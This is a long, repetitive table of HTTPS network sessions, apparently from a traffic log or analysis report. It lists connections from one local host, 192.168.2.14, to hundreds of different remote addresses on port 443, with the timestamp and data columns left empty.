                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14868192.168.2.144728019.2.166.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14869192.168.2.1434310160.191.126.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14870192.168.2.144071872.131.114.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14871192.168.2.1434322116.251.211.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14872192.168.2.145208648.210.19.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14873192.168.2.1443504132.252.108.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14874192.168.2.144988824.27.166.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14875192.168.2.146063075.13.175.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14876192.168.2.1433264153.61.82.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14877192.168.2.1459700168.43.149.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14878192.168.2.143786242.14.208.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14879192.168.2.143405275.173.246.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14880192.168.2.1448312217.201.91.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14881192.168.2.144734664.86.32.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14882192.168.2.1459978201.222.227.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14883192.168.2.143512850.143.98.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14884192.168.2.1456870182.215.111.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14885192.168.2.144925252.9.84.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14886192.168.2.144722427.158.222.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14887192.168.2.1445320179.4.55.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14888192.168.2.1447494205.144.3.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14889192.168.2.145798069.106.212.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14890192.168.2.1440262208.118.129.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14891192.168.2.145520441.145.199.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14892192.168.2.1436320147.24.10.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14893192.168.2.1460646106.48.19.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14894192.168.2.1439178110.175.92.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14895192.168.2.145032476.251.66.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14896192.168.2.1433438178.157.31.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14897192.168.2.1441910191.252.114.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14898192.168.2.1447368149.37.254.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14899192.168.2.144694684.170.151.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14900192.168.2.1434626136.178.96.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14901192.168.2.143838643.88.193.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14902192.168.2.1448260180.81.241.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14903192.168.2.1453266129.208.164.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14904192.168.2.145831414.49.216.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14905192.168.2.1433514109.68.102.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14906192.168.2.145729050.164.74.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14907192.168.2.1434428198.35.227.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14908192.168.2.145287245.108.201.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14909192.168.2.1441844145.10.210.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14910192.168.2.1456782118.38.221.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14911192.168.2.1458764137.57.28.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14912192.168.2.1445154119.209.207.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14913192.168.2.1450982130.254.121.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14914192.168.2.145314298.34.86.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14915192.168.2.145379244.21.89.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14916192.168.2.1452464133.26.243.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14917192.168.2.1445970180.72.5.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14918192.168.2.1441774186.1.204.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14919192.168.2.1448358156.218.244.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14920192.168.2.1436900139.13.113.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14921192.168.2.1441366169.148.213.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14922192.168.2.145394454.242.115.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14923192.168.2.1452184187.180.95.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14924192.168.2.145254814.114.95.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14925192.168.2.1449564113.111.227.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14926192.168.2.144486234.15.120.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14927192.168.2.144862860.6.123.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14928192.168.2.1446030148.127.0.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14929192.168.2.143690082.19.171.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14930192.168.2.1443278201.102.2.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14931192.168.2.143557274.200.94.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14932192.168.2.145399697.40.203.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14933192.168.2.1444330212.1.71.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14934192.168.2.1459564181.0.51.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14935192.168.2.1446708216.151.189.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14936192.168.2.14356182.46.156.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14937192.168.2.1436342101.229.138.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14938192.168.2.1439858132.74.60.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14939192.168.2.146031412.220.107.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14940192.168.2.144787443.141.188.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14941192.168.2.1451042191.235.190.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14942192.168.2.1453430109.107.140.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14943192.168.2.144234417.231.61.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14944192.168.2.143733287.203.8.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14945192.168.2.145613632.230.68.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14946192.168.2.1434076203.65.39.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14947192.168.2.1438218188.192.238.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14948192.168.2.143750472.185.50.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14949192.168.2.145550877.61.64.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14950192.168.2.1444952203.244.221.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14951192.168.2.1453450210.194.155.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14952192.168.2.144795076.214.29.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14953192.168.2.1446638182.134.175.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14954192.168.2.145668412.2.196.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14955192.168.2.1442108175.14.147.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14956192.168.2.144519020.217.153.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14957192.168.2.145727471.224.180.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14958192.168.2.1452404144.142.58.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14959192.168.2.1439408108.255.81.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14960192.168.2.145389487.237.122.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14961192.168.2.144055020.2.89.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14962192.168.2.143310818.80.232.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14963192.168.2.1435624199.196.30.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14964192.168.2.1437664139.150.122.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14965192.168.2.1436092212.189.191.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14966192.168.2.14499389.189.160.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14967192.168.2.1453028133.173.17.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14968192.168.2.1452522161.145.44.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14969192.168.2.1458458188.36.148.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14970192.168.2.1455248220.0.79.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14971192.168.2.1457964124.228.178.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14972192.168.2.1456842119.221.22.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14973192.168.2.1457100108.158.229.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14974192.168.2.144808027.114.120.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14975192.168.2.1436070157.208.35.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14976192.168.2.1441728177.167.9.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14977192.168.2.1453562101.236.145.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14978192.168.2.1451862131.81.78.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14979192.168.2.1456130125.83.137.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14980192.168.2.145024889.126.145.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14981192.168.2.1457758121.8.128.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14982192.168.2.144994665.231.246.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14983192.168.2.1445678177.146.223.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14984192.168.2.1435052192.209.134.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14985192.168.2.1456888137.216.9.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14986192.168.2.1459502211.172.63.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14987192.168.2.1447698157.72.84.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14988192.168.2.143423843.148.99.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14989192.168.2.145423858.160.248.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14990192.168.2.143660614.250.178.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14991192.168.2.1448970142.216.118.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14992192.168.2.143288036.192.188.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14993192.168.2.145977247.188.119.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14994192.168.2.1454576116.66.243.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14995192.168.2.1436752217.237.135.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14996192.168.2.144432238.75.254.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14997192.168.2.144662443.205.128.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14998192.168.2.1449918184.237.93.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14999192.168.2.1434008181.115.246.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15000192.168.2.1437378113.147.248.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15001192.168.2.1456828203.62.153.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15002192.168.2.146024638.9.171.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15003192.168.2.1435604209.174.154.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15004192.168.2.1448126109.170.219.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15005192.168.2.1443862210.187.45.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15006192.168.2.145982440.210.75.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15007192.168.2.1446764193.46.106.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15008192.168.2.145769813.91.16.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15009192.168.2.144183019.36.205.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15010192.168.2.1460976182.24.187.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15011192.168.2.145886677.14.10.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15012192.168.2.1445928108.69.4.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15013192.168.2.145718877.152.143.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15014192.168.2.1443378179.153.204.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15015192.168.2.144267442.16.115.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15016192.168.2.145032252.178.197.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15017192.168.2.1454434143.72.225.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15018192.168.2.144608692.75.252.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15019192.168.2.145369447.158.113.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15020192.168.2.1454502125.46.232.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15021192.168.2.1452876179.107.89.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15022192.168.2.1452958131.214.216.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15023192.168.2.1446726198.35.67.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15024192.168.2.145963218.218.216.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15025192.168.2.1445556176.81.234.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15026192.168.2.143868491.11.143.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15027192.168.2.1457430139.208.34.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15028192.168.2.1437574203.103.240.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15029192.168.2.1435486209.141.156.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15030192.168.2.143529438.216.103.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15031192.168.2.1459042210.146.187.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15032192.168.2.145736257.244.174.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15033192.168.2.1453238170.15.222.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15034192.168.2.1459586158.121.102.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15035192.168.2.145423638.34.193.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15036192.168.2.144932293.48.239.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15037192.168.2.1456122101.107.93.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15038192.168.2.1446942110.76.187.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15039192.168.2.1460372131.249.47.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15040192.168.2.143337473.10.242.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15041192.168.2.1443574157.7.235.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15042192.168.2.145512687.103.86.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15043192.168.2.144293290.96.205.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15044192.168.2.1451478120.140.5.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15045192.168.2.1433920156.118.205.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15046192.168.2.1444348201.170.59.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15047192.168.2.1460800102.24.195.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15048192.168.2.1453624166.238.127.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15049192.168.2.143610867.210.13.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15050192.168.2.1440006117.131.66.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15051192.168.2.1439718201.222.191.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15052192.168.2.1454344117.35.249.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15053192.168.2.1434488208.101.173.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15054192.168.2.1449382175.121.140.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15055192.168.2.144497266.178.163.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15056192.168.2.144647899.61.218.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15057192.168.2.144661877.47.105.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15058192.168.2.1436974186.178.192.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15059192.168.2.1444806110.95.92.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15060192.168.2.1444516205.21.46.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15061192.168.2.1438772113.92.179.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15062192.168.2.144947063.209.5.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15063192.168.2.145621634.201.200.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15064192.168.2.1449274189.111.39.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15065192.168.2.1441658123.235.122.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15066192.168.2.143441052.34.156.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15067192.168.2.1457726160.254.124.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15068192.168.2.145703239.201.22.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15069192.168.2.1457736124.245.210.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15070192.168.2.145497088.134.231.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15071192.168.2.1457952204.19.222.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15072192.168.2.1453308111.161.39.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15073192.168.2.1445368139.150.161.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15074192.168.2.1455246128.80.122.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15075192.168.2.1447396189.228.141.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15076192.168.2.145955424.18.234.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15077192.168.2.144018295.200.189.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15078192.168.2.1439798103.105.178.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15079192.168.2.144382473.169.1.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15080192.168.2.1455274124.241.45.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15081192.168.2.1452502198.6.123.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15082192.168.2.144362267.88.142.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15083192.168.2.1437576151.24.187.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15084192.168.2.1439498201.246.216.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15085192.168.2.145911490.145.201.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15086192.168.2.1454878129.38.38.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15087192.168.2.143729277.70.53.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15088192.168.2.144423891.226.110.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15089192.168.2.143471845.237.157.118443
